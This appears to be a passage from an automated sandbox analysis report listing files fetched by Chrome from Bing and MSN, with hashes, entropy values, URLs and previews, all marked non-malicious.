                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (5983), with no line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):5983
                                                                                                                                                                                                                                                                        Entropy (8bit):5.2825366147372455
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:96:kiz62PGRHEKnpA7Yc33HxTVwXKRsVNS6cvPOZWVjJnxdSwxxtR2EA8SOsDquOj:kie+GRHFnaLNjXOZWRYwxN2EANOsDqum
                                                                                                                                                                                                                                                                        MD5:785D3C1D93D18E5478F0C3FFCE35CD03
                                                                                                                                                                                                                                                                        SHA1:1F7533428AF383A196CC2319477B762F86500514
                                                                                                                                                                                                                                                                        SHA-256:B32B54F6D1BE64DF456502B677407D4CFA5F10E98CDE9350D9E63331FDBB7BFC
                                                                                                                                                                                                                                                                        SHA-512:F374DED54893E2CC95D2F8BAE4C7896F9CB4BC21E0C53B773D31F90E6D940C6ADB8552130D210D4BD43AB69EC25BCD64887660581DC5FC454C634C4E7B6037D7
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:var Feedback;(function(n){var t;(function(t){function u(t,r,u,f,e,o){t=typeof t===i?!1:t;t&&scrollTo(0,0);u=typeof u===i?!0:u;n.PackageLoad.Load(r,u,f,e,o)}function o(n,t){for(var r=0,i=null;n&&n.getAttribute&&(!(t>=1)||r<t);){if(i=n.getAttribute("data-fbhlsel"),i!=null)break;r++;n=n.parentNode}return i}function a(t,a,v,y,p,w,b,k,d){function ot(t){var r=null,i;return t&&(i=new c,n.fel("ajax.feedback.collectsettings","gsf",i),r=i.findSettings(t)),r}var it,tt,nt,et,rt,g,ut,ft;(sj_cook&&(tt=sj_cook.get("fdbk_acc","tabfocus"),tt&&(nt=_ge(tt),nt?(nt.focus(),sj_cook.clear("fdbk_acc","/")):(nt=document.querySelector('[id^="'+tt+'"]'),nt?(nt.focus(),sj_cook.clear("fdbk_acc","/")):(et=tt.indexOf("thumb_f")!=-1&&a.indexOf("thumb_f")!=-1||tt.indexOf("thumb_t")!=-1&&a.indexOf("thumb_t")!=-1,et&&(nt=_ge(a),rt=(it=nt===null||nt===void 0?void 0:nt.parentElement)===null||it===void 0?void 0:it.parentElement,rt&&rt.classList.contains("l_ecrd_tud")&&(nt.focus(),sj_cook.clear("fdbk_acc","/"))))))),g=_ge(a
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (21914)
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):333094
                                                                                                                                                                                                                                                                        Entropy (8bit):5.531682600483987
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6144:wvSLyC8/HRyAKlzUMW2V29Ze6GUz4FYg/xdOPOyR5l66u7c:aSLyHHoA+UMW2VgZe6Ve7c
                                                                                                                                                                                                                                                                        MD5:953AC271E5C4045748024EC4BD25EA4A
                                                                                                                                                                                                                                                                        SHA1:E4BA200F84257BD68DD926672C1C6E89F5498CE0
                                                                                                                                                                                                                                                                        SHA-256:F0B02102168ABB1BD5A486C58107F86BE47A70775ADC2E8CFAD2FD734D4861A9
                                                                                                                                                                                                                                                                        SHA-512:A39121C001037CBFC49A995E843150F5B060CB88583C3AB315D283931ADE335D8001A78318943B946B510CC0523FD2B2C6090CD9A07E9613C05AB05C64F59B63
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://assets.msn.com/bundles/v1/bingHomepage/latest/experience.b67d868a3e7ad5bd4ffa.js
                                                                                                                                                                                                                                                                        Preview:!function(){"use strict";var t,e,i,o,a,n={96779:function(t,e,i){i.r(e),i.d(e,{MsnActionsMenu:function(){return I}});var o=i(33940),a=i(21772),n=i(63070),r=i(8522),s=i(37627),d=i(27535);var l=i(28904),c=i(99452),p=i(42590),h=i(94537),g=i(56692),u=i(44572),m=i(37802);class f extends l.H{constructor(){super(...arguments),this.useFastAnchoredRegion=!0,this.useDetailPageStyles=!1,this.fixedPosition=!1,this.defaultVerticalPosition="bottom",this.defaultHorizontalPosition="end",this.autoFocus=!0,this.zoomFactor=1,this.isUpdatingPosition=!1,this.isBingHp="bingHomepage"===g.jG.AppType,this.isViews="views"===g.jG.AppType,this.fixedParentSpace=!1,this.keyDownHandler=t=>(t.key===h.CX?(this.referrerButton&&this.referrerButton.focus(),this.$emit("dismiss-menu"),t.stopPropagation()):t.key===h.oM&&(this.customTabEventHandler?this.customTabEventHandler(this,t):this.tabEventHandler(t)),!0),this.updatePositionManually=()=>{this.updatePosition()},this.tabEventHandler=t=>{if(this.fluentMenu){const e=this.fl
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 300x225, components 3
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):16687
                                                                                                                                                                                                                                                                        Entropy (8bit):7.950672537236447
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:384:e3YZ/H50YgKyHdSBNOF1ID2CcyQ8zIZy6WlplzPU:ee0R/KOFIcdUNlplzPU
                                                                                                                                                                                                                                                                        MD5:0A8621F424090CFF344AE4E11B087D8D
                                                                                                                                                                                                                                                                        SHA1:A89C713647E101EFDCC0A5884EF45C26C9587468
                                                                                                                                                                                                                                                                        SHA-256:C11A311AC73911421DF4FD1786641D3C7BCC21EEF6D546DB2CFFB33322FC4A1D
                                                                                                                                                                                                                                                                        SHA-512:27161260719E06A5F032D34772FD9C4BB85D03FA39687AA673AA12CA96799072EE0BA1A572DB8965CC0D87F46ED4F8D18E799D5709B3800F2014968BC9020FDF
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://th.bing.com/th?id=ORMS.76b0b01f1ea76150c5982874a2bd3acb&pid=Wdp&w=300&h=225&qlt=90&c=1&rs=1
                                                                                                                                                                                                                                                                        Preview:......JFIF.....`.`.....C....................................................................C.........................................................................,.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?......-....Q.......1.E\....<.......Xw.........>.._B.c..:6.4.+4..2O'..~-..^..i%bH8.]....7V.F..8..>.-5..I.n..z.J..f...*5.=Q..N.-.QVX..N.xGT.t..En.....}S...0xv..P.e.5......k..n.m..2.....t.K[]..Md....k.:.f.z..F.~.?>.e_..S...c..g..........U._....2.+...j..U$Y._.{V>.e.....@.|.........4.G.2....ZXgB...._....].-~[.L.8..z.jO.^Y.Phq.|.W-.{...4.e...Fv.....X.b........
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):1477
                                                                                                                                                                                                                                                                        Entropy (8bit):5.147477666443474
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:t4I6nxZuFcLwLsLjpaABLNRERBLLR5RBLoRFkERBLh4HxpGydGPS5HxpGESGMcRD:knpLwLsLj3LN2TLLHTLoUETLuHaDPGHd
                                                                                                                                                                                                                                                                        MD5:411B26A34D3C7CAB1793600C7461D628
                                                                                                                                                                                                                                                                        SHA1:5F4D10834676335CB8FECBF4A6405BDFDB02B2B7
                                                                                                                                                                                                                                                                        SHA-256:EAB006435A852C9CBD409B53D14980A92DD072DCCC22316FC562528EB0C54000
                                                                                                                                                                                                                                                                        SHA-512:C1F73327871B9B80008D1E57291E1DD2B09068CB0564C597183DFD1EE58E7C2FF131DC3F9EA71A411A87142C1AB038B354C430137AAA90BF0D95A684C083BB41
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://assets.msn.com/staticsb/statics/latest/icons-wc/icons/traffic/TrafficTitle.svg
                                                                                                                                                                                                                                                                        Preview:<svg xmlns="http://www.w3.org/2000/svg" fill="none" viewBox="0 0 16 16" width="14" height="16">..<path fill="#737A80" d="M1 1h14a4 4 0 01-4 4H5a4 4 0 01-4-4zM1 6h14a4 4 0 01-4 4H5a4 4 0 01-4-4zM1 11h14a4 4 0 01-4 4H5a4 4 0 01-4-4z"/>..<rect width="8" height="16" x="4" fill="url(#paint0_linear)" rx="1"/>..<circle cx="8" cy="3" r="2" fill="#FF4C00"/>..<circle cx="8" cy="3" r="2" fill="url(#paint1_linear)"/>..<circle cx="8" cy="8" r="2" fill="#FFB900"/>..<circle cx="8" cy="8" r="2" fill="url(#paint2_linear)"/>..<g>.. <circle cx="8" cy="13" r="2" fill="#78D30C"/>.. <circle cx="8" cy="13" r="2" fill="url(#paint3_linear)"/>..</g>..<defs>.. <linearGradient id="paint0_linear" x1="8" x2="8" y1="0" y2="16" gradientUnits="userSpaceOnUse">.. <stop stop-color="#5C6166"/>.. <stop offset="1" stop-color="#45494D"/>.. </linearGradient>.. <linearGradient id="paint1_linear" x1="9" x2="7" y1="4.732" y2="1.268" gradientUnits="userSpaceOnUse">.. <stop stop-color="#D83B01"/>.. <stop offset="
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=5, xresolution=74, yresolution=82, resolutionunit=2, software=GIMP 2.10.8, datetime=2019:07:31 17:53:43], progressive, precision 8, 160x160, components 3
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):4934
                                                                                                                                                                                                                                                                        Entropy (8bit):7.782095567670307
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:96:sHbZoNWsmjRgjXFQvdXNkuz4nicDWk+4Nf6Q2mKwADHfXC7OWn:sFmmjGjWddkuz4nicyktAtmtAbuLn
                                                                                                                                                                                                                                                                        MD5:FDA2CEAE0679611937E6E71F701A36AB
                                                                                                                                                                                                                                                                        SHA1:75B98D4B8E7142F0F57620296354F61C4C6F3A8F
                                                                                                                                                                                                                                                                        SHA-256:B818C1E9B0B46CCCDC158ACA581C3C5F4A9BD3DDA380DA03AF52F43F14F5651E
                                                                                                                                                                                                                                                                        SHA-512:904100EBE310AFDF86C2E4C9CBDDC118178D41B45D076BB6077DB8F3BCED8B3CEDF545CE079E39B6F8034C2247FD4C824C0522B6221E3CDC02423AF8EEB9F8A3
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://r.bing.com/rp/dbmNS45xQvD1diApY1T2HExvOo8.jpg
                                                                                                                                                                                                                                                                        Preview:......JFIF.....H.H......Exif..II*...............J...........R...(...........1.......Z...2.......f.......H.......H.......GIMP 2.10.8.2019:07:31 17:53:43....C...........................#.%$"."!&+7/&)4)!"0A149;>>>%.DIC<H7=>;...C...........;("(;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;......................................................................................._..Z/9.....AhY...T0*!Eu,..dk.....y. .LP.B..V..m@@f....<uf.......h...)8.2j..*U...<.n....4.B.-....W..^.J..o.{.....z.....".s.,.S...;...^f<.O8,>u.s...n.)....\o..6.{.=#:(.F.;..;1].V.........U5.1..W..g7|r5..==...Hy..h....@...KV.{.l.9.........F.S....N{9.Y..(C.f..u\..&OX..-..N..w\..(.:.1..:ldGW.q.!...mo...e.=........a2..:hkA.....Z.:r}.....Z[...../\...-..A.#..E-K.5..k........]....yQhiAF........cy.[...C..qg.j.Y..Q3.Uh(..X.>kjs..5.....=.M.J.m.Q...FE.m=s..>.WSv..J..42+....V..[....n,.h..5...\.I]...%T.0k.=...h..5.td....].@.\..^.r....d.f..[....k....0*E.U..H.....G...]]Z.M.Y..-..I....%.......................
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):225826
                                                                                                                                                                                                                                                                        Entropy (8bit):7.997591578026521
                                                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                                                        SSDEEP:6144:p7TNznG8JwsweeGhLh+tGvnsi74hkdqySyWhRo+F:p7ThG8+teeGhKUv74HyS5mQ
                                                                                                                                                                                                                                                                        MD5:66CA49C5E9F38102BE83941EDBBE3FF0
                                                                                                                                                                                                                                                                        SHA1:08E06EBEFE20B22D1764A2275CD9AAE78F65A062
                                                                                                                                                                                                                                                                        SHA-256:A90FEC7BF86C6274F7C1A3CE196F5E444958A6021FDDFB5A3D9AFE9A14DA7BF9
                                                                                                                                                                                                                                                                        SHA-512:71A417D326F4853F105BB69F95703C9CFB4196637861394E76E9653B290D6CD2969F13AE8A344464B32362BFF309625596A315EA112F74308245A93423C4EBBE
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:RIFF.r..WEBPVP8X.... ......7..ICCPH......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1........
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (938), with no line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):938
                                                                                                                                                                                                                                                                        Entropy (8bit):5.18200878052665
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:GFUFqJYYmaLOTCE20aOtZP9F3a6MakIzHF+lvyUJ9sq5aOB:BWOWEZP9U6MUEvyUJ9s6
                                                                                                                                                                                                                                                                        MD5:DBF771B1F0B05393D18BC55FD6DD94A7
                                                                                                                                                                                                                                                                        SHA1:BC4FD6C9EFB2E87D2D30F19DD78C9188B6D76B2D
                                                                                                                                                                                                                                                                        SHA-256:F2C5677D58718AE60F7F4E98351643AFEB8AD7FDFE4B2B6AF0B7B63108CB7071
                                                                                                                                                                                                                                                                        SHA-512:50B113243923EC8E4432288AE4FDE5B2FD0339C0EE785D33543E2C502F366E33BA99B0B1C0893E78CA23B820B71A9E3E4CBA31F5D865C43A989E3262D869ADCE
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:var ShareDialog;(function(n){function i(){t("bootstrap",arguments)}function r(){t("show",arguments)}function u(){t("showError",arguments)}function t(n,t){for(var r=["shdlgapi",n],i=0;i<t.length;i++)r.push(t[i]);sj_evt.fire.apply(null,r)}n.bootstrap=i;n.show=r;n.showError=u})(ShareDialog||(ShareDialog={})),function(n){function i(){t==0&&u()}function r(){sj_evt.unbind("shdlgapi",i)}function u(){t=1;var n=ShareDialogConfig.shareDialogUrl+"&IG="+_G.IG;n=e(n,["uncrunched","testhooks"]);sj_ajax(n,{callback:function(n,i){n?(t=2,i.appendTo(_d.body),r(),f()):t=3},timeout:0})}function f(){var n="rms";_w[n]&_w[n].start()}function e(n,t){var i,r,u;for(r in t)u=new RegExp("[?&]".concat(t[r],"=[^?&#]*"),"i"),(i=location.href.match(u))&&i[0]&&(n+="&"+i[0].substring(1));return n}function o(){n.inited=0}function s(){n.inited||(n.inited=1,sj_evt.bind("shdlgapi",i,!0),sj_evt.bind("ajax.unload",o,!1))}var t=0;s()}(ShareDialog||(ShareDialog={}))
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1111
                                                                                                                                                                                                                                                                        Entropy (8bit):4.1426352870909255
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:tDbU/vj3Dx8DDolDLN9wBWUyDa8uz5fCMe4I/76GVf8wz1vVsG4Iu5Tz1mH38zRO:y/b9EolDLf6WUmUzhvr+76GLz16Jk8tO
                                                                                                                                                                                                                                                                        MD5:5E834A775C3B3F93F83F7C48E5286257
                                                                                                                                                                                                                                                                        SHA1:7F6D63952326103378DCE69ABDC75A07EECF86AD
                                                                                                                                                                                                                                                                        SHA-256:006563DB23523A6369D81FCFA6F3515F0317CF651D74024635D2BFBE694779B8
                                                                                                                                                                                                                                                                        SHA-512:D575CF4076626957D2AF68EF808930910969244E989CDB770CE303900471A52ACCC36F52D1C0B1E7605AA4A5DD92ED1DC0540605CAC60C7317E27B7BD2C0EBEE
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:<svg fill="none" height="24" viewBox="0 0 24 24" width="24" xmlns="http://www.w3.org/2000/svg"><path d="m19.6667 0c2.3932 0 4.3333 1.94011 4.3333 4.33333v4c0 .55228-.4477 1-1 1s-1-.44772-1-1v-4c0-1.28866-1.0447-2.33333-2.3333-2.33333h-4c-.5523 0-1-.44772-1-1s.4477-1 1-1zm-15.33337 0c-2.39324 0-4.33333 1.94009-4.33333 4.33333v4c0 .55228.44772 1 1 1s1-.44772 1-1v-4c0-1.28866 1.04467-2.33333 2.33333-2.33333h4c.55228 0 1-.44772 1-1s-.44772-1-1-1zm15.33337 24c2.3932 0 4.3333-1.9401 4.3333-4.3333v-4c0-.5523-.4477-1-1-1s-1 .4477-1 1v4c0 1.2886-1.0447 2.3333-2.3333 2.3333h-4c-.5523 0-1 .4477-1 1s.4477 1 1 1zm-19.6667-4.3333c0 2.3932 1.94009 4.3333 4.33333 4.3333h4c.55228 0 1-.4477 1-1s-.44772-1-1-1h-4c-1.28866 0-2.33333-1.0447-2.33333-2.3333v-4c0-.5523-.44772-1-1-1s-1 .4477-1 1zm12-3.6667c2.2092 0 4-1.7908 4-4s-1.7908-4-4-4-4 1.7908-4 4 1.7908 4 4 4zm0-2c-1.1045 0-2-.8955-2-2s.8955-2 2-2 2 .8955 2 2-.8955 2-2 2zm-6-6.66667c.73639 0 1.33333-.59694 1.33333-1.33333 0-.73637-.59694-1.33333-1.33333
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1228), with no line terminators
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):1228
                                                                                                                                                                                                                                                                        Entropy (8bit):5.021257455081656
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:6Vj1V5FrGj6BBE2eyo6maDU6CWi4dDRRE0Slc7qHy5++vY:8v5TBiF6U6C+DLSiL+P
                                                                                                                                                                                                                                                                        MD5:04E46D18C015E7C22CB2E4B43DCEFD05
                                                                                                                                                                                                                                                                        SHA1:212F9F2089A5F85033160582DCCB1B41A7E4CD15
                                                                                                                                                                                                                                                                        SHA-256:A8172A1CD35702E0679AA2FC817640738B09D8C2A1BACF4A132E68D314407744
                                                                                                                                                                                                                                                                        SHA-512:E3FD5F578CD864C0B1905C3342C3539CC98D78DE8A4734EB2629558ECA566F464890425250610DE11CB9950C481DDB5C3ABF6557E189D7153461F43FE62D34AD
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://r.bing.com/rp/IS-fIIml-FAzFgWC3MsbQafkzRU.js
                                                                                                                                                                                                                                                                        Preview:var Feedback;(function(n){var t;(function(){"use strict";function u(t,i){var u=t.getAttribute("id"),f;u||(u="genId"+n.length,t.setAttribute("id",u));f=new r(u,i,t.getAttribute(i));n.push(f)}function i(n,t,i){i===null?n.removeAttribute(t):n.setAttribute(t,i)}function t(n,t,r,f){for(var e,s=_d.querySelectorAll(r),o=0;o<s.length;o++)(e=s[o],f&&e.id&&f[e.id])||(u(e,n),i(e,n,t))}function f(n){for(var u=_d.querySelectorAll(n),e=1,f={},t,i,r=0;r<u.length;++r){if(t=u[r],!t.id){for(;;)if(i="fbpgdgelem".concat(e++),!_ge(i))break;t.id=i}f[t.id]=t}return f}function e(){var i="tabindex",r="-1",n=f("#fbpgdg, #fbpgdg *");t(i,r,"div",n);t(i,r,"svg",n);t(i,r,"a",n);t(i,r,"li",n);t(i,r,"input",n);t(i,r,"select",n);t("aria-hidden","true","body :not(script):not(style)",n)}function o(){for(var r,t=0;t<n.length;t++)r=_d.getElementById(n[t].id),r&&i(r,n[t].attributeName,n[t].originalAttributeValue);n.length=0}function s(){typeof sj_evt!="undefined"&&(sj_evt.bind("onFeedbackStarting",function(){e()}),sj_evt.b
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (13209)
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):34737
                                                                                                                                                                                                                                                                        Entropy (8bit):5.524612998629534
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:768:hsMy1gQ6f5nHq2bFcNuXVesb0C8LRu048KSE:c1gQ6xndBPXVbs2
                                                                                                                                                                                                                                                                        MD5:3B8FCB70AC101E1D74A1D4490434C0F4
                                                                                                                                                                                                                                                                        SHA1:35BC203982A9E4034C5ABFD2CD16CE1779B470EC
                                                                                                                                                                                                                                                                        SHA-256:1EE6B1F0CAE491D7F368ABB6C0C80D13F511C02152A6E76657A200507A673BA8
                                                                                                                                                                                                                                                                        SHA-512:822127F5FBACD6E7B07487CFC4BC9457709C0534848CF8D09573B46E4E652E9F3D7316EFF78DCCA81779B7776BF69ECF803295EE3714C47400771F9C31A67DF2
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://assets.msn.com/bundles/v1/bingHomepage/latest/weather-legacy-card-deferred.38f180b2907591f854fe.js
                                                                                                                                                                                                                                                                        Preview:"use strict";(self.webpackChunk_msnews_msnews_experiences=self.webpackChunk_msnews_msnews_experiences||[]).push([["weather-legacy-card-deferred"],{48729:function(t,e,i){i.r(e),i.d(e,{delayLoadLegacyComponent:function(){return ut}});var o=i(33940),n=i(28904),a=i(42590),s=i(99452),l=i(38985),c=i(29422);const g={saveTelemetryTag:"saveButton",cancelTelemetryTag:"cancelButton",fahrenheitTelemetryTag:"fahrenheitRadio",celsiusTelemetryTag:"celsiusRadio",inputTelemetryTag:"locationSearchInput",searchClearTelemetryTag:"searchClear",suggestTelemetryTag:"locationSuggest",detectLocationTelemetryTag:"detectLocationButton"};var r,d,h=i(94537),u=i(90017);!function(t){t[t.Success=1]="Success",t[t.Failure=2]="Failure"}(r||(r={})),function(t){t[t.Fahrenheit=1]="Fahrenheit",t[t.Celsius=2]="Celsius"}(d||(d={}));class p extends n.H{constructor(){super(...arguments),this.showSuggests=!1,this.inputFocused=!1,this.inputClearFocused=!1,this.handleDocumentKeydown=t=>{if(t.defaultPrevented||!this.settingData)ret
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 50x50, components 3
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):921
                                                                                                                                                                                                                                                                        Entropy (8bit):7.145517941301961
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:pXSy4bIeyyZg3OZ3UpYo/EaSxkVfOwuXWPRCPO1B:pXz4sVyZrpBtZxkROwuAX
                                                                                                                                                                                                                                                                        MD5:840349845B0267FC28B329F5BBFC2BA4
                                                                                                                                                                                                                                                                        SHA1:9E8F7CD9172625A7C695E4F955F194AA6A35AD65
                                                                                                                                                                                                                                                                        SHA-256:5721EF774EE3BBC132B3C64BB5D3EDC55A6B76173F78288E85190CEC214EF3CF
                                                                                                                                                                                                                                                                        SHA-512:53D30E17518F93B7C907A01A84CBEF1C423DD129064DC723FE2318F9F84F8E3E97DAD3E670CDBF8BE21E0DD84C424B16D96D6231AE7DC7E39058C4F0CDDF5331
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:......JFIF.............C.......................................%..%....)).%756.*2>-)0.;!....C...........,...,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,......2.2..".......................................5.........................!.1A.Qq.."2Bar...#4R.bs.....................................................!.............?..ETR5.Vkk..$d7u...R.)h....y..{.rO...e.}.+.{....*J.!...T.8O0..:s.[]~..Z...~....q...<.....6;AQ......`.|].m2...J...+7...:O\....3.v4GU.;....u.(.b....wC.=.H...iJPE)R...."F|:.s..i@....n4..H._ZR.|B..k.p.%..k8...-.7.kS...F..KJ.n.e......y,...m..x...i....d..ql....i...7>5E..B.[.9..c..VUk.n.,...J.1...[..iJPxW....u....l.n".}.0.b....2..q....9'..C8.j...q-=.......X.@~..Ax+..*\w....Q......L...\n...)......... }5\.)..._8~.mN(o.e.IR~_.MYlvk.....#JDe).*.\.K......9'...2.......#.......Cn(. !........:..u-*..;bQ......V.&\izf..U.!..q%I.y.)jO.0y..G..:"iJP)JP(0....;.JR.@..C.)J..)A..
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):512
                                                                                                                                                                                                                                                                        Entropy (8bit):4.510163916949154
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6:6v/lhPahm1lWrg91nyJV1JGOZBouB1eNAWmXcKQ1W1:6v/74+dyJV2O/TDSYsKQ8
                                                                                                                                                                                                                                                                        MD5:2CB038DB4D785FBF1014B83723250865
                                                                                                                                                                                                                                                                        SHA1:9F146FB8557766B4ECD653CB0FF96DF85FFC0BE0
                                                                                                                                                                                                                                                                        SHA-256:AE57256091E86B729C7D6E575DF6C005FAF49B50036E32B63BDF07E5DBAA4B40
                                                                                                                                                                                                                                                                        SHA-512:FD938D5B5F055CE0E585922AF1D349AC0D4A1104EA890A871B681633548A9CA80F12C3A7A430D9D3253A465A74EF648CD71FEACCAABBDCF99275EEF1747B73CE
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1ecIHO.img?w=16&h=16&q=100&m=6&f=png&u=t
                                                                                                                                                                                                                                                                        Preview:.PNG........IHDR................a....pHYs..........+......IDATx......Q...C32!..JbC....d..\.\....Z....RJ,..;.7`.._..;.|g.1...`.w.A.......8.E.2.....=-.E....>..*.(b....b.....9A.z.Kt..U.....8. P@.-(HS<.C...%h...EM.g].D.B....*..K...}....C....+|TJ.T?.....,{........IEND.B`..........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):1101
                                                                                                                                                                                                                                                                        Entropy (8bit):4.829151166001716
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:t0S8eLfl954T0u2y3EO1gRcDrIvQaDxijjfscC:vLfRWtPDuQKIjq
                                                                                                                                                                                                                                                                        MD5:91CD11CFCCA65CFACE96153268D71F63
                                                                                                                                                                                                                                                                        SHA1:E0BE107728D3BF41D8136220DA897D798A2AC60F
                                                                                                                                                                                                                                                                        SHA-256:8EE1E6D7A487C38412D7B375AC4A6BD7E47F70858055EEB7957226ADA05544BE
